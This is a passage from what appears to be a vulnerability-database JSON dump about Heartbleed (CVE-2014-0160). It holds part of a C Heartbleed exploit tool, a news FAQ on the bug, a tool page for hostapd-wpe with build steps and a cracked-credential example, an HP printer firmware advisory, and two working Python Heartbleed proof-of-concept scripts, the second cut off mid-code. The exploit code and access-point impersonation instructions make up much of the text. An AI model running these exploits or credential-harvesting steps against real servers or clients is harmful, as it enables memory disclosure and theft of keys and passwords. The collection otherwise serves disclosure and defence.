loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_connect(host, port);\r\n\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\tc = tls_connect(ret);\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tSSL_shutdown(c->sslHandle);\r\n\t\tclose (ret);\r\n\t\tSSL_free(c->sslHandle);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tif (udp) {\r\n\t\t\tc = dtls_server(sd, host, port);\r\n\t\t\twhile (1) {\r\n\t\t\t\tchar * bytes = malloc(1024);\r\n\t\t\t\tstruct sockaddr_in peer;\r\n\t\t\t\tsocklen_t len = sizeof(peer);\r\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_bind(host, port);\r\n\t\t\twhile(1){\r\n\t \t\t\tsd=accept(ret,0,0);\r\n\t\t\t\tif(sd==-1){\r\n\t\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tif(pid=fork()){\r\n\t\t\t\t\tclose(sd);\r\n\t\t\t\t}\r\n\t \t\t\telse{\r\n\t\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86255"}], "thn": [{"lastseen": "2018-01-27T09:17:11", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "[![HeartBleed Bug Explained - 10 Most Frequently Asked Questions](https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s728/heartbleed.png)](<https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s1600/heartbleed.png>)\n\n_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), The Heartbleed bug is a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL, a popular version of the Transport Layer Security (TLS) protocol.\n\n \n\n\n**2.) HOW IT WORKS?**\n\nFor SSL to work, your computer needs to communicate to the server via sending '_**heartbeats**_' that keep informing the server that client (computer) is online (alive).\n\n \n\n\nHeartbleed attack allows an attacker to retrieve a block of memory of the server up to 64kb in response directly from the vulnerable server via sending the malicious heartbeat and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\n \n\n\nIt opens doors for the cyber criminals to extract sensitive data directly from the server's memory without leaving any traces.\n\n[![HeartBleed Bug Explained - 10 Most Frequently Asked Questions](https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png)](<https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png>) \n--- \n_xkcd comic http://xkcd.com/1354/_ \n**3.) HEARTBLEED ATTACK RELIES ON MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to deal with a Man-in-the-Middle (MitM) attack. But using Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could set up a fake website that passes the security verification.\n\n \n\n\nAn attacker could also decrypt the traffic passing between a client and a server i.e. Perfect man-in-the-middle attack on HTTPS connection.\n\n \n\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so it can be used to attack clients as well as servers. An Attacker can obtain up to 64K memory from the server or client as well that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\n \n\n\nResearcher [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) two-thirds of the world's servers i.e. half a million servers are affected by the Heartbleed Bug, including websites, email, and instant messaging services.\n\n \n**Video Explanation:** \n\n\n**5.) HOW HEARTBLEED AFFECTS SMARTPHONES?**\n\nSmartphone is the best practical example of Client side attacks.\n\n \n\n\nAll versions of Android OS include outdated versions of OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to Heartbleed bug, whereas Apple's iOS devices are not affected by OpenSSL flaw.\n\n \n\n\nGoogle had patched the affected version Android 4.1.1, but it will take long time to deliver updated Android version to the end Smartphone users as updates to majority handsets are controlled by phone manufacturers and wireless carriers. Until users running the affected versions are vulnerable to the attacks, and hackers will definitely take advantage of this public disclosure.\n\n \n\n\n**6.) WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, Routers, Medical devices, Smart TV sets, embedded devices and millions of other devices that rely on the OpenSSL to provide secure communications could also be vulnerable to Heartbleed bug, as it is not expected for these devices to get the updates soon from Google\u2019s Android partners.\n\n \n\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) the critical infrastructure organizations (like energy, utilities or financial services companies) to beef-up their systems in order to defend against the Heartbleed attacks.\n\n \n\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe actually can't blame anyone developer, specially who are contributing to Open Source projects without money motivations. \n\n \n\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n \n\n\n\"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) '_I did so unintentionally_'.\n\n \n\n\n**8.) WHO HAS EXPLOITED THIS BUG YET?**\n\nBloomberg accused the National Security Agency (NSA) of knowing the Heartbleed bug for the last two years. Not even this, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. But if it is so, then this would be one of the biggest developments in the history of wiretapping ever. However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it saying NSA was not aware of Heartbleed until it was made public.\n\n \n\n\nBut when it comes to exploit any known vulnerability, then Hackers are most likely to be top on the list. As the flaw was so widely spread that it affected half a million websites worldwide, so after the public disclosure, the cybercriminals could reach the sites to steal credentials, passwords and other data, before the site operators apply the freely available patch.\n\n \n\n\nThere are multiple Proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CHANGING ACCOUNT PASSWORDS CAN SOLVE THE ISSUE?**\n\nNot exactly, as Heartbleed attack has the ability to leak anything from the server including your passwords, credit card details or any kind of personal information. But, in order to protect your online accounts you should at least change your passwords immediately for the sites that resolved the issue and for the sites not affected by the bug as well, just to make sure that you are safe.\n\n \n\n\nFirst of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using following services or apps:, and if you're given a red flag, avoid the site for now.\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n * To check whether your Android devices are safe or not, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL and the scanner also checks the version of the library and whether heartbeat is enabled or not.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy as it leaves no traces behind and here the matter goes worse.\n\n \n\n\nYou may never know if you have been hacked using the flaw or not. This means that there is no way to tell if your information was stolen previously from a site or a service that has now fixed it.\n\n \n\n\nBut if you haven't change the password to the popular sites yet, then yes, your password and financial information are still widely open to cybercriminals and other spying agencies.\n\n \n\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all DON'T PANIC. You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw then your every effort is useless, as it\u2019s up to the site to first fix the vulnerability as soon as possible , because changing the password before the bug is fixed could compromise your new password as well. \n \nIf you own a vulnerable SSL Service, then you are recommended to: \n\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Safe! \n\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "modified": "2014-04-17T10:28:24", "published": "2014-04-14T20:40:00", "id": "THN:244769C413FFA5BE647D8F6F93431B74", "href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "n0where": [{"lastseen": "2019-05-29T18:37:05", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "## hostapd-wpe \u2013 Wireless Pwnage Edition \u2013 \n\n* * *\n\nhostapd-wpe is the replacement for [ FreeRADIUS-WPE ](<http://www.willhackforsushi.com/?page_id=37>) . It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable. \n\nhostapd-wpe supports the following EAP types for impersonation: \n\n 1. EAP-FAST/MSCHAPv2 (Phase 0) \n 2. PEAP/MSCHAPv2 \n 3. EAP-TTLS/MSCHAPv2 \n 4. EAP-TTLS/MSCHAP \n 5. EAP-TTLS/CHAP \n 6. EAP-TTLS/PAP \n\nOnce impersonation is underway, hostapd-wpe will return an EAP-Success message so that the client believes they are connected to their legitimate authenticator. For 802.11 clients, hostapd-wpe also implements [ Karma-style gratuitous probe ](<http://www.foofus.net/?page_id=115>) responses \u2013 by JoMo-Kun\u2019s patch for older versions of hostapd. hostapd-wpe also implements CVE-2014-0160 (Heartbleed) attacks against vulnerable clients \u2013 provided by the [ Cupid PoC: ](<https://github.com/lgrangeia/cupid>) hostapd-wpe logs all data to stdout and hostapd-wpe.log \n\nThe current hostapd-wpe.patch is for: hostapd-2.2.tar.gz \n\n## Quick Usage \n\nOnce hostapd-wpe.patch is applied, hostapd-wpe.conf will be created at /path/to/build/hostapd/hostapd-wpe.conf. See that file for more information. Note that /path/to/build/hostapd/hostapd-wpe.eap_users \nwill also be created, and hostapd-wpe is dependent on it. \n\n## Basic usage: \n \n \n hostapd-wpe hostapd-wpe.conf\n\nCredentials will be displayed on the screen and stored in hostapd-wpe.log \n\nAdditional WPE command line options are: \n\n * ** -s ** \u2013 Return EAP-Success messages after credentials are harvested \n * ** -k ** \u2013 Gratuitous probe responses (Karma mode) \n * ** -c ** \u2013 Attempt to exploit CVE-2014-0160 (Cupid mode) \n\n## Building \n \n \n $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe\n\nUbuntu/Debian/Kali Building \n \n \n $ apt-get update\r\n $ apt-get install libssl-dev libnl-dev\n\nif you\u2019re using Kali install: \n \n \n $ apt-get install libssl-dev libnl-genl-3-dev\n\n## General \n\nNow apply the hostapd-wpe.patch: \n \n \n $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe\n \n \n $ wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz\r\n $ tar -zxf hostapd-2.2.tar.gz\r\n $ cd hostapd-2.2\r\n $ patch -p1 < ../hostapd-wpe/hostapd-wpe.patch\r\n $ cd hostapd\n\nIf you\u2019re using Kali 2.0 edit .config file and uncomment: \n \n \n CONFIG_LIBNL32=y\n \n \n $ make\n\nCopy the certs directory and scripts from FreeRADIUS to ease that portion of things. You should just be able to: \n \n \n $ cd ../../hostapd-wpe/certs\r\n $ ./bootstrap\n\nthen finally just: \n \n \n $ cd ../../hostapd-2.2/hostapd\r\n $ sudo ./hostapd-wpe hostapd-wpe.conf\n\n## Running Access Point Impersonation Attacks: \n\nWith all of that complete, you can run hostapd. The patch will create a new hostapd-wpe.conf, which you\u2019ll likely need to modify in order to make it work for your attack. Once ready just run \n \n \n hostapd hostapd-wpe.conf\n\nLook in the output for the username/challenge/response. It\u2019ll be there and in a hostapd-wpe.log file in the directory you ran hostapd from for instance here are the EAP-FAST Phase 0 creds from stdout: \n \n \n username: jdslfkjs\r\n challenge: bc:87:6c:48:37:d3:92:6e\r\n response: 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0\n\nand as always, we feed them into asleap to crack: \n \n \n # asleap -C bc:87:6c:48:37:d3:92:6e -R 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 -W wordlist\r\n asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>\r\n hash bytes: b1ca\r\n NT hash: e614b958df9df49ec094b8730f0bb1ca\r\n password: bradtest\n\nAlternatively MSCHAPv2 credentials are outputted in john the rippers NETNTLM format. \n\n## EAP-Success \n\nCertain EAP types do not require the server to authenticate itself, just to validate the client\u2019s submitted credentials. Since we\u2019re playing the authentication server, that means we can easily just return an EAP-Success message to the client regardless of what they send us. The client is happy because they\u2019ve connected, but unfortunately are unaware that they are connected to an unapproved authenticator. \n\nAt this point, the attacker can set up a dhcp server and give the client an IP and then do whatever they\u2019d like (e.g. redirect dns, launch attacks, MiTM, etc..) \n\nMSCHAPv2 protects against this by having the server prove knowledge of the password most supplicants adhere to this policy, but we return EAP-Success just in case. \n\n## Karma-Style Probes \n\nThis functionality simply waits for an client to send a directed probe, when it does, it assumes that SSID and responds to the client. Only applicable to 802.11 clients. \n\n## A note on MSCHAPv2 \n\nMicrosoft offers something called \u201cComputer Based Authentication\u201d. When a computer joins a domain it is assigned a password. This password is stored on the system and in active directory. We can harvest the MSCHAPv2 response from these systems but its going to take a lifetime to crack. Unless you\u2019re just trying to solve for the hash, and not the actual password \ud83d\ude42 \n\nOne other thing to note, if the client returns all zeros, it isnt joined to a domain. \n\n## Source && Download \n\n[ ![download](https://n0where.net/wp-content/uploads/2015/01/download.jpg) ](<https://github.com/OpenSecurityResearch/hostapd-wpe>)\n", "edition": 4, "modified": "2016-04-12T22:19:39", "published": "2016-04-12T22:19:39", "id": "N0WHERE:76566", "href": "https://n0where.net/access-point-impersonation-attacks-hostapd-wpe", "title": "Access Point Impersonation Attacks: hostapd-wpe", "type": "n0where", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hp": [{"lastseen": "2020-12-24T13:21:11", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "## Potential Security Impact\nRemote disclosure of information \n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified in HP Officejet Pro X printers and in certain Officejet Pro printers running OpenSSL. This is the OpenSSL vulnerability known as \"Heartbleed\" (CVE-2014-0160) which could be exploited remotely resulting in disclosure of information. \n\n## RESOLUTION\nHP has provided firmware updates for impacted printers as set forth in the table below. To obtain the updated firmware, go to the HP Software and Drivers page for your product and find the firmware update from the list of available software. \n\nProduct Name \n\n| \n\nModel Number \n\n| \n\nFirmware Revision \n \n---|---|--- \n \nHP Officejet Pro X451dn Printer \n\n| \n\nCN459A \n\n| \n\nBNP1CN1409BR \n \nHP Officejet Pro X451dw Printer \n\n| \n\nCN463A \n\n| \n\nBWP1CN1409BR \n \nHP Officejet Pro X551dw Printer \n\n| \n\nCV037A \n\n| \n\nBZP1CN1409BR \n \nHP Officejet Pro X476dn Multifunction Printer \n\n| \n\nCN460A \n\n| \n\nLNP1CN1409BR \n \nHP Officejet Pro X476dw Multifunction Printer \n\n| \n\nCN461A \n\n| \n\nLWP1CN1409BR \n \nHP Officejet Pro X576dw Multifunction Printer \n\n| \n\nCN598A \n\n| \n\nLZP1CN1409BR \n \nHP Officejet Pro 276dw Multifunction Printer \n\n| \n\nCR770A \n\n| \n\nFRP1CN1416BR \n \nHP Officejet Pro 251dw Printer \n\n| \n\nCV136A \n\n| \n\nEVP1CN1416BR \n \nHP Officejet Pro 8610 e-All-in-One Printer \n\n| \n\nA7F64A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8615 e-All-in-One Printer \n\n| \n\nD7Z36A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8620 e-All-in-One Printer \n\n| \n\nA7F65A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8625 e-All-in-One Printer \n\n| \n\nD7Z37A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8630 e-All-in-One Printer - \n\n| \n\nA7F66A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8640 e-All-in-One Printer \n\n| \n\nE2D42A \n\n| \n\nFDP1CN1416AR \n \nHP Officejet Pro 8660 e-All-in-One Printer \n\n| \n\nE1D36A \n\n| \n\nFDP1CN1416AR \n", "edition": 3, "modified": "2014-07-12T00:00:00", "published": "2014-04-30T00:00:00", "id": "HP:C04272043", "href": "https://support.hp.com/us-en/document/c04272043", "title": "HPSBPI03031 rev.3 - HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information", "type": "hp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "edition": 1, "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "href": "", "sourceData": "#!/usr/bin/python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\n\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\n\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\n\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\n\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \n\ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\n\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\n\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "edition": 1, "published": "2014-04-09T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "href": "", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\n# Date: [2014-04-09]\n# Exploit Author: [Csaba Fitzl]\n# Vendor Homepage: [http://www.openssl.org/]\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\n# Version: [1.0.1f]\n# Tested on: [N/A]\n# CVE : [2014-0160]\n\n\n#!/usr/bin/env python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\n\nversion = []\nversion.append(['SSL 3.0','03 00'])\nversion.append(['TLS 1.0','03 01'])\nversion.append(['TLS 1.1','03 02'])\nversion.append(['TLS 1.2','03 03'])\n\ndef create_hello(version):\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\treturn hello\n\ndef create_hb(version):\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\n\treturn hb\n\ndef hexdump(s):\n\tfor b in xrange(0, len(s), 16):\n\t\tlin = [c for c in s[b : b + 16]]\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\n\tprint\n\ndef recvall(s, length, timeout=5):\n\tendtime = time.time() 